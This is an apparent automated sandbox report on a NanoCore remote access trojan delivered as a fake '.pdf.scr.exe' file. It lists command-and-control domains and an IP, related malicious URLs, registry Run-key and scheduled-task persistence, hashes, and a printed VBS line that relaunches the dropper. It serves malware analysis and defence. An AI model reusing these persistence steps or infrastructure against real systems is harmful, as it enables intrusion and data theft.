      Source: ihgsvw.exe, 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordA
ttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe, Code function: 6_2_00C22163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00C22163
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
      Execution: 111 Scripting; 2 Native API; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
      Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
      Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 312 Process Injection; 1 Scheduled Task/Job; 21 Registry Run Keys / Startup Folder; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
      Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 111 Scripting; 12 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 12 Masquerading; 121 Virtualization/Sandbox Evasion; 312 Process Injection; 1 Hidden Files and Directories
      Credential Access: 21 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
      Discovery: 1 System Time Discovery; 1 Account Discovery; 4 File and Directory Discovery; 35 System Information Discovery; 341 Security Software Discovery; 121 Virtualization/Sandbox Evasion; 2 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery; 1 Remote System Discovery
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
      Collection: 11 Archive Collected Data; 21 Input Capture; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
      Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Data Encoding; 1 Remote Access Software; 1 Non-Application Layer Protocol; 21 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
      Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact
      [Behavior graph: ID 798041, Sample: 004349256789197.pdf.scr.exe, Startdate: 03/02/2023, Architecture: WINDOWS, Score: 100]

      Source | Detection | Scanner | Label | Link
      004349256789197.pdf.scr.exe | 45% | ReversingLabs | Win32.Trojan.Lisk |
      004349256789197.pdf.scr.exe | 39% | Virustotal | | Browse

      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | 100% | Avira | DR/AutoIt.Gen |
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 0% | ReversingLabs | |
      C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe | 26% | ReversingLabs | Win32.Dropper.Generic |

      Source | Detection | Scanner | Label | Link | Download
      22.2.RegSvcs.exe.720000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7 | | Download File
      10.2.RegSvcs.exe.6210000.7.unpack | 100% | Avira | TR/NanoCore.fadte | | Download File

      No Antivirus matches

      Source | Detection | Scanner | Label | Link
      december2nd.ddns.net | 100% | Avira URL Cloud | malware |
      december2n.duckdns.org | 100% | Avira URL Cloud | malware |
      NameIPActiveMaliciousAntivirus DetectionReputation
      december2nd.ddns.net
      212.193.30.230
      truetrue
        unknown
        december2n.duckdns.org
        212.193.30.230
        truetrue
          unknown
      Name | Malicious | Antivirus Detection | Reputation
      december2nd.ddns.net | true | Avira URL Cloud: malware | unknown
      december2n.duckdns.org | true | Avira URL Cloud: malware | unknown

      Name | Source | Malicious | Antivirus Detection | Reputation
      https://www.autoitscript.com/autoit3/ | 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp | false | | high

      IP | Domain | Country | ASN | ASN Name | Malicious
      212.193.30.230 | december2nd.ddns.net | Russian Federation | 57844 | SPD-NETTR | true

              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:798041
              Start date and time:2023-02-03 17:50:31 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 16m 3s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:39
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:004349256789197.pdf.scr.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@43/45@28/1
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 99.7% (good quality ratio 92.4%)
              • Quality average: 78.8%
              • Quality standard deviation: 29.5%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 185
              • Number of non-executed functions: 228
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240s for sample files taking high CPU consumption
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
              • Not all processes were analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.
              Time | Type | Description
              17:51:58 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              17:52:03 | Task Scheduler | Run new task: DHCP Monitor path: "C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0)
              17:52:06 | Task Scheduler | Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
              17:52:06 | API Interceptor | 1646x Sleep call for process: RegSvcs.exe modified
              17:52:06 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs
              17:52:15 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              17:52:25 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              17:52:33 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs
              17:52:48 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              17:52:56 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs

              Match | Associated Sample Name / URL | Detection | Context
              212.193.30.230 | PO.js | malicious | 212.193.30.230:6505/Vre
              212.193.30.230 | payment.js | malicious | 212.193.30.230:7780/is-ready
              212.193.30.230 | PO.js | malicious | 212.193.30.230:6505/Vre
              212.193.30.230 | PO.js | malicious | 212.193.30.230:7780/is-ready
              212.193.30.230 | NewPO.js | malicious | 212.193.30.230:7780/is-ready
              212.193.30.230 | dPFhxftFKAvajay.js | malicious | 212.193.30.230:7975/Vre

              Match | Associated Sample Name / URL | Detection | Context
              december2nd.ddns.net | 026910003102350.pdf.scr.exe | malicious | 212.193.30.230
              december2nd.ddns.net | Ox0YJcdK4s.exe | malicious | 212.193.30.230
              december2nd.ddns.net | IMG_000249230.pdf.scr.exe | malicious | 194.5.98.176
              december2n.duckdns.org | 026910003102350.pdf.scr.exe | malicious | 212.193.30.230
              december2n.duckdns.org | jjE6r0O7rF.exe | malicious | 212.193.30.230
              december2n.duckdns.org | Ox0YJcdK4s.exe | malicious | 212.193.30.230
              december2n.duckdns.org | obsERXPYBe.exe | malicious | 194.5.98.176
              december2n.duckdns.org | pu8PvGDGha.exe | malicious | 194.5.98.176
              december2n.duckdns.org | c6U3ESasLi.exe | malicious | 194.5.98.176

              Match | Associated Sample Name / URL | Detection | Context
              SPD-NETTR | 026910003102350.pdf.scr.exe | malicious | 212.193.30.230
              SPD-NETTR | 8el2WF5ixS.exe | malicious | 195.133.40.130
              SPD-NETTR | A3F0B643265E9895B3291658516CE2B34EB06D585BD8E.exe | malicious | 212.193.30.115
              SPD-NETTR | OukBj2y5jY.exe | malicious | 195.133.40.200
              SPD-NETTR | proof of payment & invoice copy.docx.doc | malicious | 212.193.30.4
              SPD-NETTR | http://195.133.40.73/bins/Paralysis.arm | malicious | 195.133.40.73
              SPD-NETTR | invoice89938.exe | malicious | 212.193.30.230
              SPD-NETTR | FJsd1qxDgJ.exe | malicious | 195.133.40.200
              SPD-NETTR | LhWQCnZEr8.exe | malicious | 195.133.40.200
              SPD-NETTR | Comprobant.xls | malicious | 195.133.40.200
              SPD-NETTR | jwlIVLR3d6.exe | malicious | 195.133.40.200
              SPD-NETTR | Odeme.xls | malicious | 195.133.40.200
              SPD-NETTR | Comprobante Enero.xls | malicious | 195.133.40.200
              SPD-NETTR | p3TPW34SPc.exe | malicious | 195.133.40.200
              SPD-NETTR | Promotion Instruction & Personal Referral Link for YouTube partners.docx.scr.exe | malicious | 195.133.40.102
              SPD-NETTR | LiRDJvWMnF.exe | malicious | 212.193.30.230
              SPD-NETTR | file.exe | malicious | 195.133.40.119
              SPD-NETTR | HEUR-Trojan.Win32.Crypt.gen-e026bc9a0b7ac31a8.exe | malicious | 212.193.30.115
              SPD-NETTR | D677F86403915B15AB62B1278CC7E6A8F2A98DE2BA6A8.exe | malicious | 212.193.30.115
              SPD-NETTR | invoice_78336.xlsm | malicious | 212.193.30.230

              No context
              No context
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):45152
              Entropy (8bit):6.149629800481177
              Encrypted:false
              SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
              MD5:2867A3817C9245F7CF518524DFD18F28
              SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
              SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
              SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):142
              Entropy (8bit):5.090621108356562
              Encrypted:false
              SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
              MD5:8C0458BB9EA02D50565175E38D577E35
              SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
              SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
              SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
              Malicious:false
              Reputation:unknown
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):142
              Entropy (8bit):5.090621108356562
              Encrypted:false
              SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
              MD5:8C0458BB9EA02D50565175E38D577E35
              SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
              SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
              SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
              Malicious:false
              Reputation:unknown
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
              Process:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):151
              Entropy (8bit):5.088165235670747
              Encrypted:false
              SSDEEP:3:FER/n0eFH5OerbJSRE2J5xAIzbgDU4AdjNerbJSRE2J5xAIzbgRoeqn:FER/lFHIe0i23fzbgDUPjNe0i23fzbg2
              MD5:A9A3C2871C5B661CFE0BD95B12693457
              SHA1:E8C39E23AE2DF49D7D9C461BE91C20FF1B4FDB44
              SHA-256:C64E277FBBCB7B0B7693A0EA11925A1AB3C966723A97A2381851EE269DA571AF
              SHA-512:44B1D4E5CF629E6A91B32721B9B7E2939455DB0ACAEC08DE68E8512CB0C6503BE549E09C3E28E0EAFCB32812B72E398EF471FB39BDF3EF4E15AB3AF58BA63CDE
              Malicious:false
              Reputation:unknown
              Preview:CreateObject("WScript.Shell").Run "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC"
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:data
              Category:dropped
              Size (bytes):121649618
              Entropy (8bit):7.0364100465274175
              Encrypted:false
              SSDEEP:196608:NFJK4YyNlildTiCgW6hwsT3mYfb4tMV6zlR5+gmtZtQJYuPng/Kj8nGj3AExAcYc:g
              MD5:004A5D8E43630E4D5DB63A5BB6159FCC
              SHA1:285BD4A523DC7B93B0EFB86978D0FA4591E45D85
              SHA-256:9D5D8B0428D63CC43A9503591D94C62CD1606C26732735A2A950CA63147B367B
              SHA-512:F7756E3FB6B82FB75C53B6CAB6BA5E97B7774ED61F41549E222038FB3C745BD2784FC85D8ECC4DAAD7F09139A73C8E44863BC07E226AF71B4292609774034CD4
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:dropped
              Size (bytes):407473
              Entropy (8bit):4.048588207938584
              Encrypted:false
              SSDEEP:
              MD5:48F9952AAAFE4CA15D39581E78889AC0
              SHA1:569F6FB010FEFB412192A968784DB355B8311853
              SHA-256:7F322D3E2096AA1F60CBF945595F155314D434A4FDD5A35640DF9363570FE666
              SHA-512:BAE18549694F7D75F24D057F21380C30CA6F9C7579EE3D4EAD2F4CAFF92E541797ABFA970688170501DE1EA378B5F0CAF071B46BD7C28030D6C15EFBA5296B87
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):588
              Entropy (8bit):6.213002454543603
              Encrypted:false
              SSDEEP:
              MD5:F821802654AA671984C34C52D1CDCFD4
              SHA1:D4E04EFDB9402CA2090A8602C54B84400ABC71A1
              SHA-256:4BB1B7DE0C409D831CE769B0ACB7ED9F753710B487D3B6135C5758DD0AAFD86C
              SHA-512:8DAB9616753F29F84BAA87012F6FEA6A0185DF12BCE18D334DFF95AC77210EF25680EAD8FC034F60D0EBB40B4D78FA814902F1EE49519E813E9A91FFE3F36AAB
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):524
              Entropy (8bit):6.2118134349266025
              Encrypted:false
              SSDEEP:
              MD5:046256AD551F6765F23E871E20A666A5
              SHA1:79FF6979F39E5DCFA15B81922E947B19B4A4D6B0
              SHA-256:08248EBE1BCE86EA542860C50CCD847580D22CB133A78D524B5D1C714CBBB331
              SHA-512:57BB2D43E8263F6B2F9D37A609940B7BB8B8A0C324451FAA78AD8A35264DA04D3461B58787C3632D7506D2F52D49032B20716FBB8060014FD098FE830F6820BA
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):607
              Entropy (8bit):6.201298305828523
              Encrypted:false
              SSDEEP:
              MD5:043E8B1857BEEABA3718A7F3847122D5
              SHA1:7BB750324587EDB34690AA0B789869B15406ECDD
              SHA-256:9524F0E243E06157AFAAD36B50DAF38166331029B5226C16543B2F7AEA1F4E2F
              SHA-512:D7F29E19A3162697D314DD98B3C11E1DDAE2768C79F7E25F96D36D38E5AC2FF0F15BB2DBE9A3F19AADF2430554865099B8F12C9B07C005C8E835CB16FFADA2FA
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):539
              Entropy (8bit):6.206196757309823
              Encrypted:false
              SSDEEP:
              MD5:6E72ACECBCA63A02F17F09893C4ECC5B
              SHA1:B667E4B9DD2659CF40784B523AB6ECAFC715C452
              SHA-256:B6C25984BEEC32852E2AB5E928F7099DE75BAED20852749A603ED89EFC219E63
              SHA-512:E1CF9C9DAA24A5B4099AE18DDB4E6E9B572ED9251E13BE0D804D3A35E9F0171EB4420921CFAB625058744209D9E6604FC370F1B365CDB60ABFFCEF162E366458
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):572
              Entropy (8bit):6.2074620354651575
              Encrypted:false
              SSDEEP:
              MD5:4BD4541ADFD4E488EACDFF04D29183BE
              SHA1:46FF43B901FE30FC60D07FD8F913BDB9B7C7756D
              SHA-256:0C5F56ABB0BC00576718A0554507D9068FB7E83E4E3B44FE5435371467AD160C
              SHA-512:58E109BC252B51DE3770B5062759158E359D47E51682E66D9E693585BB64E3425D54D3DB4EB3D95B43AE6B2D18F724480594885A363D29CE6DCC9C27436B613F
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):669
              Entropy (8bit):6.256842582335099
              Encrypted:false
              SSDEEP:
              MD5:D20C31B84E18489E4E27B1D5591E9F45
              SHA1:7F6D3CD2F26E1E458C91FA23BB2E489737A6286D
              SHA-256:A8E5BE91B492A1B25ED40D3C9BF20B9CACF662B6C15180A77BF3033C073C292E
              SHA-512:549140F915E92F090AD58571EB544E7D18AB6E4E0D2BEABAF036D95884B12E3FD547474DBF8F793E7691D4D9F1709CF333C41E3D73FFB29791B174D1EF3A122C
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):1357068
              Entropy (8bit):6.400387425104881
              Encrypted:false
              SSDEEP:
              MD5:797174324A2A71F55AD4E89DA918B52D
              SHA1:0B75AD2A9E182993A220D261F74B68D70F97398A
              SHA-256:AED1188582A5A13FF39A6C9D324BC9A5D0A8CEDB56814B1017CC35D2A6F3548E
              SHA-512:F9A1799F74EF31AB2958463D9557AD3A65D51112F90EC64674DD5675115997019248F5C920E8DEB50A12A90BA2A6EF40D2C5F00C98B3ABD4D3E081866F37B7FC
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 26%
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):578
              Entropy (8bit):6.208581968969855
              Encrypted:false
              SSDEEP:
              MD5:18D244E2DA84E8B08621DB3D2C714ECE
              SHA1:7C03348C271C40E02418075E5678A5906576C280
              SHA-256:592477758051ED96DBCF1300248BD10B1F800287D7E0AFD8012A7D4B446E4C91
              SHA-512:671FEA619563C02F32E0458CE15062BE3F9404A795F763EDEB2934CA0DA24B5487AE721D9CA1B4A5B056E8FB1B8684EF45F7E90519DD6EBF4C90143E01A628E5
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):701
              Entropy (8bit):6.217263929891554
              Encrypted:false
              SSDEEP:
              MD5:03224F8D3517549E40641731A5211E8D
              SHA1:C9FC0CCFAB73A464DABE64D52737D86ED47DE581
              SHA-256:9FA367942F2C23664CBC8498A334C716F26BF2C1732A5C9490876CBAA3944F6E
              SHA-512:B0E1BE6303B1BB5426F9F0F40AF342544CDD393783F87108B63C5216FAB128FE5AB25561515CECAEE0FA1572A5C8227B08C49E11E18ECFDC08E58A653DE9A743
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):549
              Entropy (8bit):6.213056313966432
              Encrypted:false
              SSDEEP:
              MD5:9FFFAA49E0C74C82366B031E8D873414
              SHA1:B71020F66B4D55066C04A5504425649B93DC78F2
              SHA-256:251A281F2856F3CFEC0FD3472028E9ED3AEB5EF558CCAC820EA67C9E8524FE6A
              SHA-512:3E103990CFD5057E9D9B9095805227B226DA59DA4974E237046D1D98653E3C67629DC74C6C0647FFE0A9E8EFAE2F4999E1C2C9EFB2B5C8081879D895CC9A41AA
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):620
              Entropy (8bit):6.222206344450024
              Encrypted:false
              SSDEEP:
              MD5:DDC613AF180A41E7B305D2D26E77AED6
              SHA1:682E34C9A6D1A245798B44BE73D47399CBFC60A3
              SHA-256:A0B85CAEE9398B79BB9D7BE632FC2CA14A4E53204A8ECCA296C8CF25C9BAC7F4
              SHA-512:B6A7931AC3281005313641C9D1C3472E4E4646BC63A7B559A6CA911ACD959CF9D07B802E8F919F8DDAA995E61F0B9DEB57BA3C21EE9886D03360C6B1E905E0FB
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):636
              Entropy (8bit):6.245326274571603
              Encrypted:false
              SSDEEP:
              MD5:A70B8C03B325053D2F0A2051E3D566B7
              SHA1:E1A9CB6F876034FCD418A94D1A201DFE26631399
              SHA-256:CA9CD4CDD48DFFDDE0F6418CD08766E00E842634CC615D636540ED30CFD3C433
              SHA-512:8C5F1A8DF42EE671DE09C3D86F1B579B424C4D78E719EF96EE2B88B07DA04FAA1F0F92CDCDE4B4A25A616BD0F6F134A8636C5701E78D3747CBAA9A5F901E2B8B
              Malicious:false
              Reputation:unknown
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):46328
              Entropy (8bit):7.200808834838652
              Encrypted:false
              SSDEEP:
              MD5:E3A50ED6D88E9A241C5F8A38C74B75A5
